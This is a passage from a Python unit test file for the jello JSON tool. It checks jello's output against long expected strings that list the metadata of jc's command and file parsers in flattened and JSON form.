.parsers[5].compatible[0] = "linux";
.parsers[5].compatible[1] = "darwin";
.parsers[5].compatible[2] = "aix";
.parsers[5].compatible[3] = "freebsd";
.parsers[6].name = "csv";
.parsers[6].argument = "--csv";
.parsers[6].version = "1.0";
.parsers[6].description = "CSV file parser";
.parsers[6].author = "Kelly Brazil";
.parsers[6].author_email = "kellyjonbrazil@gmail.com";
.parsers[6].details = "Using the python standard csv library";
.parsers[6].compatible[0] = "linux";
.parsers[6].compatible[1] = "darwin";
.parsers[6].compatible[2] = "cygwin";
.parsers[6].compatible[3] = "win32";
.parsers[6].compatible[4] = "aix";
.parsers[6].compatible[5] = "freebsd";
.parsers[7].name = "df";
.parsers[7].argument = "--df";
.parsers[7].version = "1.1";
.parsers[7].description = "df command parser";
.parsers[7].author = "Kelly Brazil";
.parsers[7].author_email = "kellyjonbrazil@gmail.com";
.parsers[7].compatible[0] = "linux";
.parsers[7].compatible[1] = "darwin";
.parsers[7].magic_commands[0] = "df";
.parsers[8].name = "dig";
.parsers[8].argument = "--dig";
.parsers[8].version = "1.1";
.parsers[8].description = "dig command parser";
.parsers[8].author = "Kelly Brazil";
.parsers[8].author_email = "kellyjonbrazil@gmail.com";
.parsers[8].compatible[0] = "linux";
.parsers[8].compatible[1] = "aix";
.parsers[8].compatible[2] = "freebsd";
.parsers[8].compatible[3] = "darwin";
.parsers[8].magic_commands[0] = "dig";
.parsers[9].name = "du";
.parsers[9].argument = "--du";
.parsers[9].version = "1.1";
.parsers[9].description = "du command parser";
.parsers[9].author = "Kelly Brazil";
.parsers[9].author_email = "kellyjonbrazil@gmail.com";
.parsers[9].compatible[0] = "linux";
.parsers[9].compatible[1] = "darwin";
.parsers[9].compatible[2] = "aix";
.parsers[9].compatible[3] = "freebsd";
.parsers[9].magic_commands[0] = "du";
.parsers[10].name = "env";
.parsers[10].argument = "--env";
.parsers[10].version = "1.1";
.parsers[10].description = "env command parser";
.parsers[10].author = "Kelly Brazil";
.parsers[10].author_email = "kellyjonbrazil@gmail.com";
.parsers[10].compatible[0] = "linux";
.parsers[10].compatible[1] = "darwin";
.parsers[10].compatible[2] = "cygwin";
.parsers[10].compatible[3] = "win32";
.parsers[10].compatible[4] = "aix";
.parsers[10].compatible[5] = "freebsd";
.parsers[10].magic_commands[0] = "env";
.parsers[11].name = "file";
.parsers[11].argument = "--file";
.parsers[11].version = "1.1";
.parsers[11].description = "file command parser";
.parsers[11].author = "Kelly Brazil";
.parsers[11].author_email = "kellyjonbrazil@gmail.com";
.parsers[11].compatible[0] = "linux";
.parsers[11].compatible[1] = "aix";
.parsers[11].compatible[2] = "freebsd";
.parsers[11].compatible[3] = "darwin";
.parsers[11].magic_commands[0] = "file";
.parsers[12].name = "free";
.parsers[12].argument = "--free";
.parsers[12].version = "1.0";
.parsers[12].description = "free command parser";
.parsers[12].author = "Kelly Brazil";
.parsers[12].author_email = "kellyjonbrazil@gmail.com";
.parsers[12].compatible[0] = "linux";
.parsers[12].magic_commands[0] = "free";
.parsers[13].name = "fstab";
.parsers[13].argument = "--fstab";
.parsers[13].version = "1.0";
.parsers[13].description = "fstab file parser";
.parsers[13].author = "Kelly Brazil";
.parsers[13].author_email = "kellyjonbrazil@gmail.com";
.parsers[13].compatible[0] = "linux";
.parsers[14].name = "group";
.parsers[14].argument = "--group";
.parsers[14].version = "1.0";
.parsers[14].description = "/etc/group file parser";
.parsers[14].author = "Kelly Brazil";
.parsers[14].author_email = "kellyjonbrazil@gmail.com";
.parsers[14].compatible[0] = "linux";
.parsers[14].compatible[1] = "darwin";
.parsers[14].compatible[2] = "aix";
.parsers[14].compatible[3] = "freebsd";
.parsers[15].name = "gshadow";
.parsers[15].argument = "--gshadow";
.parsers[15].version = "1.0";
.parsers[15].description = "/etc/gshadow file parser";
.parsers[15].author = "Kelly Brazil";
.parsers[15].author_email = "kellyjonbrazil@gmail.com";
.parsers[15].compatible[0] = "linux";
.parsers[15].compatible[1] = "aix";
.parsers[15].compatible[2] = "freebsd";
.parsers[16].name = "history";
.parsers[16].argument = "--history";
.parsers[16].version = "1.2";
.parsers[16].description = "history command parser";
.parsers[16].author = "Kelly Brazil";
.parsers[16].author_email = "kellyjonbrazil@gmail.com";
.parsers[16].details = "Optimizations by https://github.com/philippeitis";
.parsers[16].compatible[0] = "linux";
.parsers[16].compatible[1] = "darwin";
.parsers[16].compatible[2] = "cygwin";
.parsers[16].compatible[3] = "aix";
.parsers[16].compatible[4] = "freebsd";
.parsers[17].name = "hosts";
.parsers[17].argument = "--hosts";
.parsers[17].version = "1.0";
.parsers[17].description = "/etc/hosts file parser";
.parsers[17].author = "Kelly Brazil";
.parsers[17].author_email = "kellyjonbrazil@gmail.com";
.parsers[17].compatible[0] = "linux";
.parsers[17].compatible[1] = "darwin";
.parsers[17].compatible[2] = "cygwin";
.parsers[17].compatible[3] = "win32";
.parsers[17].compatible[4] = "aix";
.parsers[17].compatible[5] = "freebsd";
.parsers[18].name = "id";
.parsers[18].argument = "--id";
.parsers[18].version = "1.0";
.parsers[18].description = "id command parser";
.parsers[18].author = "Kelly Brazil";
.parsers[18].author_email = "kellyjonbrazil@gmail.com";
.parsers[18].compatible[0] = "linux";
.parsers[18].compatible[1] = "darwin";
.parsers[18].compatible[2] = "aix";
.parsers[18].compatible[3] = "freebsd";
.parsers[18].magic_commands[0] = "id";
.parsers[19].name = "ifconfig";
.parsers[19].argument = "--ifconfig";
.parsers[19].version = "1.5";
.parsers[19].description = "ifconfig command parser";
.parsers[19].author = "Kelly Brazil";
.parsers[19].author_email = "kellyjonbrazil@gmail.com";
.parsers[19].details = "Using ifconfig-parser package from https://github.com/KnightWhoSayNi/ifconfig-parser";
.parsers[19].compatible[0] = "linux";
.parsers[19].compatible[1] = "aix";
.parsers[19].compatible[2] = "freebsd";
.parsers[19].compatible[3] = "darwin";
.parsers[19].magic_commands[0] = "ifconfig";
.parsers[20].name = "ini";
.parsers[20].argument = "--ini";
.parsers[20].version = "1.0";
.parsers[20].description = "INI file parser";
.parsers[20].author = "Kelly Brazil";
.parsers[20].author_email = "kellyjonbrazil@gmail.com";
.parsers[20].details = "Using configparser from the standard library";
.parsers[20].compatible[0] = "linux";
.parsers[20].compatible[1] = "darwin";
.parsers[20].compatible[2] = "cygwin";
.parsers[20].compatible[3] = "win32";
.parsers[20].compatible[4] = "aix";
.parsers[20].compatible[5] = "freebsd";
.parsers[21].name = "iptables";
.parsers[21].argument = "--iptables";
.parsers[21].version = "1.1";
.parsers[21].description = "iptables command parser";
.parsers[21].author = "Kelly Brazil";
.parsers[21].author_email = "kellyjonbrazil@gmail.com";
.parsers[21].compatible[0] = "linux";
.parsers[21].magic_commands[0] = "iptables";
.parsers[22].name = "jobs";
.parsers[22].argument = "--jobs";
.parsers[22].version = "1.0";
.parsers[22].description = "jobs command parser";
.parsers[22].author = "Kelly Brazil";
.parsers[22].author_email = "kellyjonbrazil@gmail.com";
.parsers[22].compatible[0] = "linux";
.parsers[22].compatible[1] = "darwin";
.parsers[22].compatible[2] = "cygwin";
.parsers[22].compatible[3] = "aix";
.parsers[22].compatible[4] = "freebsd";
.parsers[22].magic_commands[0] = "jobs";
.parsers[23].name = "last";
.parsers[23].argument = "--last";
.parsers[23].version = "1.0";
.parsers[23].description = "last and lastb command parser";
.parsers[23].author = "Kelly Brazil";
.parsers[23].author_email = "kellyjonbrazil@gmail.com";
.parsers[23].compatible[0] = "linux";
.parsers[23].compatible[1] = "darwin";
.parsers[23].compatible[2] = "aix";
.parsers[23].compatible[3] = "freebsd";
.parsers[23].magic_commands[0] = "last";
.parsers[23].magic_commands[1] = "lastb";
.parsers[24].name = "ls";
.parsers[24].argument = "--ls";
.parsers[24].version = "1.3";
.parsers[24].description = "ls command parser";
.parsers[24].author = "Kelly Brazil";
.parsers[24].author_email = "kellyjonbrazil@gmail.com";
.parsers[24].compatible[0] = "linux";
.parsers[24].compatible[1] = "darwin";
.parsers[24].compatible[2] = "cygwin";
.parsers[24].compatible[3] = "aix";
.parsers[24].compatible[4] = "freebsd";
.parsers[24].magic_commands[0] = "ls";
.parsers[25].name = "lsblk";
.parsers[25].argument = "--lsblk";
.parsers[25].version = "1.3";
.parsers[25].description = "lsblk command parser";
.parsers[25].author = "Kelly Brazil";
.parsers[25].author_email = "kellyjonbrazil@gmail.com";
.parsers[25].compatible[0] = "linux";
.parsers[25].magic_commands[0] = "lsblk";
.parsers[26].name = "lsmod";
.parsers[26].argument = "--lsmod";
.parsers[26].version = "1.1";
.parsers[26].description = "lsmod command parser";
.parsers[26].author = "Kelly Brazil";
.parsers[26].author_email = "kellyjonbrazil@gmail.com";
.parsers[26].compatible[0] = "linux";
.parsers[26].magic_commands[0] = "lsmod";
.parsers[27].name = "lsof";
.parsers[27].argument = "--lsof";
.parsers[27].version = "1.0";
.parsers[27].description = "lsof command parser";
.parsers[27].author = "Kelly Brazil";
.parsers[27].author_email = "kellyjonbrazil@gmail.com";
.parsers[27].compatible[0] = "linux";
.parsers[27].magic_commands[0] = "lsof";
.parsers[28].name = "mount";
.parsers[28].argument = "--mount";
.parsers[28].version = "1.1";
.parsers[28].description = "mount command parser";
.parsers[28].author = "Kelly Brazil";
.parsers[28].author_email = "kellyjonbrazil@gmail.com";
.parsers[28].compatible[0] = "linux";
.parsers[28].compatible[1] = "darwin";
.parsers[28].magic_commands[0] = "mount";
.parsers[29].name = "netstat";
.parsers[29].argument = "--netstat";
.parsers[29].version = "1.2";
.parsers[29].description = "netstat command parser";
.parsers[29].author = "Kelly Brazil";
.parsers[29].author_email = "kellyjonbrazil@gmail.com";
.parsers[29].compatible[0] = "linux";
.parsers[29].magic_commands[0] = "netstat";
.parsers[30].name = "ntpq";
.parsers[30].argument = "--ntpq";
.parsers[30].version = "1.0";
.parsers[30].description = "ntpq -p command parser";
.parsers[30].author = "Kelly Brazil";
.parsers[30].author_email = "kellyjonbrazil@gmail.com";
.parsers[30].compatible[0] = "linux";
.parsers[30].magic_commands[0] = "ntpq";
.parsers[31].name = "passwd";
.parsers[31].argument = "--passwd";
.parsers[31].version = "1.0";
.parsers[31].description = "/etc/passwd file parser";
.parsers[31].author = "Kelly Brazil";
.parsers[31].author_email = "kellyjonbrazil@gmail.com";
.parsers[31].compatible[0] = "linux";
.parsers[31].compatible[1] = "darwin";
.parsers[31].compatible[2] = "aix";
.parsers[31].compatible[3] = "freebsd";
.parsers[32].name = "pip_list";
.parsers[32].argument = "--pip-list";
.parsers[32].version = "1.0";
.parsers[32].description = "pip list command parser";
.parsers[32].author = "Kelly Brazil";
.parsers[32].author_email = "kellyjonbrazil@gmail.com";
.parsers[32].compatible[0] = "linux";
.parsers[32].compatible[1] = "darwin";
.parsers[32].compatible[2] = "cygwin";
.parsers[32].compatible[3] = "win32";
.parsers[32].compatible[4] = "aix";
.parsers[32].compatible[5] = "freebsd";
.parsers[32].magic_commands[0] = "pip list";
.parsers[32].magic_commands[1] = "pip3 list";
.parsers[33].name = "pip_show";
.parsers[33].argument = "--pip-show";
.parsers[33].version = "1.0";
.parsers[33].description = "pip show command parser";
.parsers[33].author = "Kelly Brazil";
.parsers[33].author_email = "kellyjonbrazil@gmail.com";
.parsers[33].compatible[0] = "linux";
.parsers[33].compatible[1] = "darwin";
.parsers[33].compatible[2] = "cygwin";
.parsers[33].compatible[3] = "win32";
.parsers[33].compatible[4] = "aix";
.parsers[33].compatible[5] = "freebsd";
.parsers[33].magic_commands[0] = "pip show";
.parsers[33].magic_commands[1] = "pip3 show";
.parsers[34].name = "ps";
.parsers[34].argument = "--ps";
.parsers[34].version = "1.1";
.parsers[34].description = "ps command parser";
.parsers[34].author = "Kelly Brazil";
.parsers[34].author_email = "kellyjonbrazil@gmail.com";
.parsers[34].compatible[0] = "linux";
.parsers[34].compatible[1] = "darwin";
.parsers[34].compatible[2] = "cygwin";
.parsers[34].compatible[3] = "aix";
.parsers[34].compatible[4] = "freebsd";
.parsers[34].magic_commands[0] = "ps";
.parsers[35].name = "route";
.parsers[35].argument = "--route";
.parsers[35].version = "1.0";
.parsers[35].description = "route command parser";
.parsers[35].author = "Kelly Brazil";
.parsers[35].author_email = "kellyjonbrazil@gmail.com";
.parsers[35].compatible[0] = "linux";
.parsers[35].magic_commands[0] = "route";
.parsers[36].name = "shadow";
.parsers[36].argument = "--shadow";
.parsers[36].version = "1.0";
.parsers[36].description = "/etc/shadow file parser";
.parsers[36].author = "Kelly Brazil";
.parsers[36].author_email = "kellyjonbrazil@gmail.com";
.parsers[36].compatible[0] = "linux";
.parsers[36].compatible[1] = "darwin";
.parsers[36].compatible[2] = "aix";
.parsers[36].compatible[3] = "freebsd";
.parsers[37].name = "ss";
.parsers[37].argument = "--ss";
.parsers[37].version = "1.0";
.parsers[37].description = "ss command parser";
.parsers[37].author = "Kelly Brazil";
.parsers[37].author_email = "kellyjonbrazil@gmail.com";
.parsers[37].compatible[0] = "linux";
.parsers[37].magic_commands[0] = "ss";
.parsers[38].name = "stat";
.parsers[38].argument = "--stat";
.parsers[38].version = "1.0";
.parsers[38].description = "stat command parser";
.parsers[38].author = "Kelly Brazil";
.parsers[38].author_email = "kellyjonbrazil@gmail.com";
.parsers[38].compatible[0] = "linux";
.parsers[38].magic_commands[0] = "stat";
.parsers[39].name = "systemctl";
.parsers[39].argument = "--systemctl";
.parsers[39].version = "1.0";
.parsers[39].description = "systemctl command parser";
.parsers[39].author = "Kelly Brazil";
.parsers[39].author_email = "kellyjonbrazil@gmail.com";
.parsers[39].compatible[0] = "linux";
.parsers[39].magic_commands[0] = "systemctl";
.parsers[40].name = "systemctl_lj";
.parsers[40].argument = "--systemctl-lj";
.parsers[40].version = "1.0";
.parsers[40].description = "systemctl list-jobs command parser";
.parsers[40].author = "Kelly Brazil";
.parsers[40].author_email = "kellyjonbrazil@gmail.com";
.parsers[40].compatible[0] = "linux";
.parsers[40].magic_commands[0] = "systemctl list-jobs";
.parsers[41].name = "systemctl_ls";
.parsers[41].argument = "--systemctl-ls";
.parsers[41].version = "1.0";
.parsers[41].description = "systemctl list-sockets command parser";
.parsers[41].author = "Kelly Brazil";
.parsers[41].author_email = "kellyjonbrazil@gmail.com";
.parsers[41].compatible[0] = "linux";
.parsers[41].magic_commands[0] = "systemctl list-sockets";
.parsers[42].name = "systemctl_luf";
.parsers[42].argument = "--systemctl-luf";
.parsers[42].version = "1.0";
.parsers[42].description = "systemctl list-unit-files command parser";
.parsers[42].author = "Kelly Brazil";
.parsers[42].author_email = "kellyjonbrazil@gmail.com";
.parsers[42].compatible[0] = "linux";
.parsers[42].magic_commands[0] = "systemctl list-unit-files";
.parsers[43].name = "timedatectl";
.parsers[43].argument = "--timedatectl";
.parsers[43].version = "1.0";
.parsers[43].description = "timedatectl status command parser";
.parsers[43].author = "Kelly Brazil";
.parsers[43].author_email = "kellyjonbrazil@gmail.com";
.parsers[43].compatible[0] = "linux";
.parsers[43].magic_commands[0] = "timedatectl";
.parsers[43].magic_commands[1] = "timedatectl status";
.parsers[44].name = "uname";
.parsers[44].argument = "--uname";
.parsers[44].version = "1.1";
.parsers[44].description = "uname -a command parser";
.parsers[44].author = "Kelly Brazil";
.parsers[44].author_email = "kellyjonbrazil@gmail.com";
.parsers[44].compatible[0] = "linux";
.parsers[44].compatible[1] = "darwin";
.parsers[44].magic_commands[0] = "uname";
.parsers[45].name = "uptime";
.parsers[45].argument = "--uptime";
.parsers[45].version = "1.0";
.parsers[45].description = "uptime command parser";
.parsers[45].author = "Kelly Brazil";
.parsers[45].author_email = "kellyjonbrazil@gmail.com";
.parsers[45].compatible[0] = "linux";
.parsers[45].compatible[1] = "darwin";
.parsers[45].compatible[2] = "cygwin";
.parsers[45].compatible[3] = "aix";
.parsers[45].compatible[4] = "freebsd";
.parsers[45].magic_commands[0] = "uptime";
.parsers[46].name = "w";
.parsers[46].argument = "--w";
.parsers[46].version = "1.0";
.parsers[46].description = "w command parser";
.parsers[46].author = "Kelly Brazil";
.parsers[46].author_email = "kellyjonbrazil@gmail.com";
.parsers[46].compatible[0] = "linux";
.parsers[46].compatible[1] = "darwin";
.parsers[46].compatible[2] = "cygwin";
.parsers[46].compatible[3] = "aix";
.parsers[46].compatible[4] = "freebsd";
.parsers[46].magic_commands[0] = "w";
.parsers[47].name = "who";
.parsers[47].argument = "--who";
.parsers[47].version = "1.0";
.parsers[47].description = "who command parser";
.parsers[47].author = "Kelly Brazil";
.parsers[47].author_email = "kellyjonbrazil@gmail.com";
.parsers[47].compatible[0] = "linux";
.parsers[47].compatible[1] = "darwin";
.parsers[47].compatible[2] = "cygwin";
.parsers[47].compatible[3] = "aix";
.parsers[47].compatible[4] = "freebsd";
.parsers[47].magic_commands[0] = "who";
.parsers[48].name = "xml";
.parsers[48].argument = "--xml";
.parsers[48].version = "1.0";
.parsers[48].description = "XML file parser";
.parsers[48].author = "Kelly Brazil";
.parsers[48].author_email = "kellyjonbrazil@gmail.com";
.parsers[48].details = "Using the xmltodict library at https://github.com/martinblech/xmltodict";
.parsers[48].compatible[0] = "linux";
.parsers[48].compatible[1] = "darwin";
.parsers[48].compatible[2] = "cygwin";
.parsers[48].compatible[3] = "win32";
.parsers[48].compatible[4] = "aix";
.parsers[48].compatible[5] = "freebsd";
.parsers[49].name = "yaml";
.parsers[49].argument = "--yaml";
.parsers[49].version = "1.0";
.parsers[49].description = "YAML file parser";
.parsers[49].author = "Kelly Brazil";
.parsers[49].author_email = "kellyjonbrazil@gmail.com";
.parsers[49].details = "Using the ruamel.yaml library at https://pypi.org/project/ruamel.yaml";
.parsers[49].compatible[0] = "linux";
.parsers[49].compatible[1] = "darwin";
.parsers[49].compatible[2] = "cygwin";
.parsers[49].compatible[3] = "win32";
.parsers[49].compatible[4] = "aix";
.parsers[49].compatible[5] = "freebsd";
'''
f = io.StringIO()
with contextlib.redirect_stdout(f):
testargs = ['jello', '-s']
with patch.object(sys, 'argv', testargs):
_ = jello.cli.main(data=self.jc_a_output)
self.assertEqual(f.getvalue(), self.expected)
def test_jc_a_parsers(self):
"""
Test jc -a | jello '_["parsers"]'
"""
self.expected = '''\
[
{
"name": "airport",
"argument": "--airport",
"version": "1.0",
"description": "airport -I command parser",
"author": "Kelly Brazil",
"author_email": "kellyjonbrazil@gmail.com",
"compatible": [
"darwin"
],
"magic_commands": [
"airport -I"
]
},
{
"name": "airport_s",
"argument": "--airport-s",
"version": "1.0",
"description": "airport -s command parser",
"author": "Kelly Brazil",
"author_email": "kellyjonbrazil@gmail.com",
"compatible": [
"darwin"
],
"magic_commands": [
"airport -s"
]
},
{
"name": "arp",
"argument": "--arp",
"version": "1.2",
"description": "arp command parser",
"author": "Kelly Brazil",
"author_email": "kellyjonbrazil@gmail.com",
"compatible": [
"linux",
"aix",
"freebsd",
"darwin"
],
"magic_commands": [
"arp"
]
},
{
"name": "blkid",
"argument": "--blkid",
"version": "1.0",
"description": "blkid command parser",
"author": "Kelly Brazil",
"author_email": "kellyjonbrazil@gmail.com",
"compatible": [
"linux"
],
"magic_commands": [
"blkid"
]
},
{
"name": "crontab",
"argument": "--crontab",
"version": "1.1",
"description": "crontab command and file parser",
"author": "Kelly Brazil",
"author_email": "kellyjonbrazil@gmail.com",
"compatible": [
"linux",
"darwin",
"aix",
"freebsd"
],
"magic_commands": [
"crontab"
]
},
{
"name": "crontab_u",
"argument": "--crontab-u",
"version": "1.0",
"description": "crontab file parser with user support",
"author": "Kelly Brazil",
"author_email": "kellyjonbrazil@gmail.com",
"compatible": [
"linux",
"darwin",
"aix",
"freebsd"
]
},
{
"name": "csv",
"argument": "--csv",
"version": "1.0",
"description": "CSV file parser",
"author": "Kelly Brazil",
"author_email": "kellyjonbrazil@gmail.com",
"details": "Using the python standard csv library",
"compatible": [
"linux",
"darwin",
"cygwin",
"win32",
"aix",
"freebsd"
]
},
{
"name": "df",
"argument": "--df",
"version": "1.1",
"description": "df command parser",
"author": "Kelly Brazil",
"author_email": "kellyjonbrazil@gmail.com",
"compatible": [
"linux",
"darwin"
],
"magic_commands": [
"df"
]
},
{
"name": "dig",
"argument": "--dig",
"version": "1.1",
"description": "dig command parser",
"author": "Kelly Brazil",
"author_email": "kellyjonbrazil@gmail.com",
"compatible": [
"linux",
"aix",
"freebsd",
"darwin"
],
"magic_commands": [
"dig"
]
},
{
"name": "du",
"argument": "--du",
"version": "1.1",
"description": "du command parser",
"author": "Kelly Brazil",
"author_email": "kellyjonbrazil@gmail.com",
"compatible": [
"linux",
"darwin",
"aix",
"freebsd"
],
"magic_commands": [
"du"
]
},
{
"name": "env",
"argument": "--env",
"version": "1.1",
"description": "env command parser",
"author": "Kelly Brazil",
"author_email": "kellyjonbrazil@gmail.com",
"compatible": [
"linux",
"darwin",
"cygwin",
"win32",
"aix",
"freebsd"
],
"magic_commands": [
"env"
]
},
{
"name": "file",
"argument": "--file",
"version": "1.1",
"description": "file command parser",
"author": "Kelly Brazil",
"author_email": "kellyjonbrazil@gmail.com",
"compatible": [
"linux",
"aix",
"freebsd",
"darwin"
],
"magic_commands": [
"file"
]
},
{
"name": "free",
"argument": "--free",
"version": "1.0",
"description": "free command parser",
"author": "Kelly Brazil",
"author_email": "kellyjonbrazil@gmail.com",
"compatible": [
"linux"
],
"magic_commands": [
"free"
]
},
{
"name": "fstab",
"argument": "--fstab",
"version": "1.0",
"description": "fstab file parser",
"author": "Kelly Brazil",
"author_email": "kellyjonbrazil@gmail.com",
"compatible": [
"linux"
]
},
{
"name": "group",
"argument": "--group",
"version": "1.0",
"description": "/etc/group file parser",
"author": "Kelly Brazil",
"author_email": "kellyjonbrazil@gmail.com",
"compatible": [
"linux",
"darwin",
"aix",
"freebsd"
]
},
{
"name": "gshadow",
"argument": "--gshadow",
"version": "1.0",
"description": "/etc/gshadow file parser",
"author": "Kelly Brazil",
"author_email": "kellyjonbrazil@gmail.com",
"compatible": [
"linux",
"aix",
"freebsd"
]
},
{
"name": "history",
"argument": "--history",
"version": "1.2",
"description": "history command parser",
"author": "Kelly Brazil",
"author_email": "kellyjonbrazil@gmail.com",
"details": "Optimizations by https://github.com/philippeitis",
"compatible": [
"linux",
"darwin",
"cygwin",
"aix",
"freebsd"
]
},
{
"name": "hosts",
"argument": "--hosts",
"version": "1.0",
"description": "/etc/hosts file parser",
"author": "Kelly Brazil",
"author_email": "kellyjonbrazil@gmail.com",
"compatible": [
"linux",
"darwin",
"cygwin",
"win32",
"aix",
"freebsd"
]
},
{
"name": "id",
"argument": "--id",
"version": "1.0",
"description": "id command parser",
"author": "Kelly Brazil",
"author_email": "kellyjonbrazil@gmail.com",
"compatible": [
"linux",
"darwin",
"aix",
"freebsd"
],
"magic_commands": [
"id"
]
},
{
"name": "ifconfig",
"argument": "--ifconfig",
"version": "1.5",
"description": "ifconfig command parser",
"author": "Kelly Brazil",
"author_email": "kellyjonbrazil@gmail.com",
"details": "Using ifconfig-parser package from https://github.com/KnightWhoSayNi/ifconfig-parser",
"compatible": [
"linux",
"aix",
"freebsd",
"darwin"
],
"magic_commands": [
"ifconfig"
]
},
{
"name": "ini",
"argument": "--ini",
"version": "1.0",
"description": "INI file parser",
"author": "Kelly Brazil",
"author_email": "kellyjonbrazil@gmail.com",
"details": "Using configparser from the standard library",
"compatible": [
"linux",
"darwin",
"cygwin",
"win32",
"aix",
"freebsd"
]
},
{
"name": "iptables",
"argument": "--iptables",
"version": "1.1",
"description": "iptables command parser",
"author": "Kelly Brazil",
"author_email": "kellyjonbrazil@gmail.com",
"compatible": [
"linux"
],
"magic_commands": [
"iptables"
]
},
{
"name": "jobs",
"argument": "--jobs",
"version": "1.0",
"description": "jobs command parser",
"author": "Kelly Brazil",
"author_email": "kellyjonbrazil@gmail.com",
"compatible": [
"linux",
"darwin",
"cygwin",
"aix",
"freebsd"
],
"magic_commands": [
"jobs"
]
},
{
"name": "last",
"argument": "--last",
"version": "1.0",
"description": "last and lastb command parser",
"author": "Kelly Brazil",
"author_email": "kellyjonbrazil@gmail.com",
"compatible": [
"linux",
"darwin",
"aix",
"freebsd"
],
"magic_commands": [
"last",
"lastb"
]
},
{
"name": "ls",
"argument": "--ls",
"version": "1.3",
"description": "ls command parser",
"author": "Kelly Brazil",
"author_email": "kellyjonbrazil@gmail.com",
"compatible": [
"linux",
"darwin",
"cygwin",
"aix",
"freebsd"
],
"magic_commands": [
"ls"
]
},
{
"name": "lsblk",
"argument": "--lsblk",
"version": "1.3",
"description": "lsblk command parser",
"author": "Kelly Brazil",
"author_email": "kellyjonbrazil@gmail.com",
"compatible": [
"linux"
],
"magic_commands": [
"lsblk"
]
},
{
"name": "lsmod",
"argument": "--lsmod",
"version": "1.1",
"description": "lsmod command parser",
"author": "Kelly Brazil",
"author_email": "kellyjonbrazil@gmail.com",
"compatible": [
"linux"
],
"magic_commands": [
"lsmod"
]
},
{
"name": "lsof",
"argument": "--lsof",
"version": "1.0",
"description": "lsof command parser",
"author": "Kelly Brazil",
"author_email": "kellyjonbrazil@gmail.com",
"compatible": [
"linux"
],
"magic_commands": [
"lsof"
]
},
{
"name": "mount",
"argument": "--mount",
"version": "1.1",
"description": "mount command parser",
"author": "Kelly Brazil",
"author_email": "kellyjonbrazil@gmail.com",
"compatible": [
"linux",
"darwin"
],
"magic_commands": [
"mount"
]
},
{
"name": "netstat",
"argument": "--netstat",
"version": "1.2",
"description": "netstat command parser",
"author": "Kelly Brazil",
"author_email": "kellyjonbrazil@gmail.com",
"compatible": [
"linux"
],
"magic_commands": [
"netstat"
]
},
{
"name": "ntpq",
"argument": "--ntpq",
"version": "1.0",
"description": "ntpq -p command parser",
"author": "Kelly Brazil",
"author_email": "kellyjonbrazil@gmail.com",
"compatible": [
"linux"
],
"magic_commands": [
"ntpq"
]
},
{
"name": "passwd",
"argument": "--passwd",
"version": "1.0",
"description": "/etc/passwd file parser",
"author": "Kelly Brazil",
"author_email": "kellyjonbrazil@gmail.com",
"compatible": [
"linux",
"darwin",
"aix",
"freebsd"
]
},
{
"name": "pip_list",
"argument": "--pip-list",
"version": "1.0",
"description": "pip list command parser",
"author": "Kelly Brazil",
"author_email": "kellyjonbrazil@gmail.com",
"compatible": [
"linux",
"darwin",
"cygwin",
"win32",
"aix",
"freebsd"
],
"magic_commands": [
"pip list",
"pip3 list"
]
},
{
"name": "pip_show",
"argument": "--pip-show",
"version": "1.0",
"description": "pip show command parser",
"author": "Kelly Brazil",
"author_email": "kellyjonbrazil@gmail.com",
"compatible": [
"linux",
"darwin",
"cygwin",
"win32",
"aix",
"freebsd"
],
"magic_commands": [
"pip show",
"pip3 show"
]
},
{
"name": "ps",
"argument": "--ps",
"version": "1.1",
"description": "ps command parser",
"author": "Kelly Brazil",
"author_email": "kellyjonbrazil@gmail.com",
"compatible": [
"linux",
"darwin",
"cygwin",
"aix",
"freebsd"
],
"magic_commands": [
"ps"
]
},
{
"name": "route",
"argument": "--route",
"version": "1.0",
"description": "route command parser",
"author": "Kelly Brazil",
"author_email": "kellyjonbrazil@gmail.com",
"compatible": [
"linux"
],
"magic_commands": [
"route"
]
},
{
"name": "shadow",
"argument": "--shadow",
"version": "1.0",
"description": "/etc/shadow file parser",
"author": "Kelly Brazil",
"author_email": "kellyjonbrazil@gmail.com",
"compatible": [
"linux",
"darwin",
"aix",
"freebsd"
]
},
{
"name": "ss",
"argument": "--ss",
"version": "1.0",
"description": "ss command parser",
"author": "Kelly Brazil",
"author_email": "kellyjonbrazil@gmail.com",
"compatible": [
"linux"
],
"magic_commands": [
"ss"
]
},
{
"name": "stat",
"argument": "--stat",
"version": "1.0",
"description": "stat command parser",
"author": "Kelly Brazil",
"author_email": "kellyjonbrazil@gmail.com",
"compatible": [
"linux"
],
"magic_commands": [
"stat"
]
},
{
"name": "systemctl",
"argument": "--systemctl",
"version": "1.0",
"description": "systemctl command parser",
"author": "Kelly Brazil",
"author_email": "kellyjonbrazil@gmail.com",
"compatible": [
"linux"
],
"magic_commands": [
"systemctl"
]
},
{
"name": "systemctl_lj",
"argument": "--systemctl-lj",
"version": "1.0",
"description": "systemctl list-jobs command parser",
"author": "Kelly Brazil",
"author_email": "kellyjonbrazil@gmail.com",
"compatible": [
"linux"
],
"magic_commands": [
"systemctl list-jobs"
]
},
{
"name": "systemctl_ls",
"argument": "--systemctl-ls",
"version": "1.0",
"description": "systemctl list-sockets command parser",
"author": "Kelly Brazil",
"author_email": "kellyjonbrazil@gmail.com",
"compatible": [
"linux"
],
"magic_commands": [
"systemctl list-sockets"
]
},
{
"name": "systemctl_luf",
"argument": "--systemctl-luf",
"version": "1.0",
"description": "systemctl list-unit-files command parser",
"author": "Kelly Brazil",
"author_email": "kellyjonbrazil@gmail.com",
"compatible": [
"linux"
],
"magic_commands": [
"systemctl list-unit-files"
]
},
{
"name": "timedatectl",
"argument": "--timedatectl",
"version": "1.0",
"description": "timedatectl status command parser",
"author": "Kelly Brazil",
"author_email": "kellyjonbrazil@gmail.com",
"compatible": [
"linux"
],
"magic_commands": [
"timedatectl",
"timedatectl status"
]
},
{
"name": "uname",
"argument": "--uname",
"version": "1.1",
"description": "uname -a command parser",
"author": "Kelly Brazil",
"author_email": "kellyjonbrazil@gmail.com",
"compatible": [
"linux",
"darwin"
],
"magic_commands": [
"uname"
]
},
{
"name": "uptime",
"argument": "--uptime",
"version": "1.0",
"description": "uptime command parser",
"author": "Kelly Brazil",
"author_email": "kellyjonbrazil@gmail.com",
"compatible": [
"linux",
"darwin",
"cygwin",
"aix",
"freebsd"
],
"magic_commands": [
"uptime"
]
},
{
"name": "w",
"argument": "--w",
"version": "1.0",
"description": "w command parser",
"author": "Kelly Brazil",
"author_email": "kellyjonbrazil@gmail.com",
"compatible": [
"linux",
"darwin",
"cygwin",
"aix",
"freebsd"
],
"magic_commands": [
"w"
]
},
{
"name": "who",
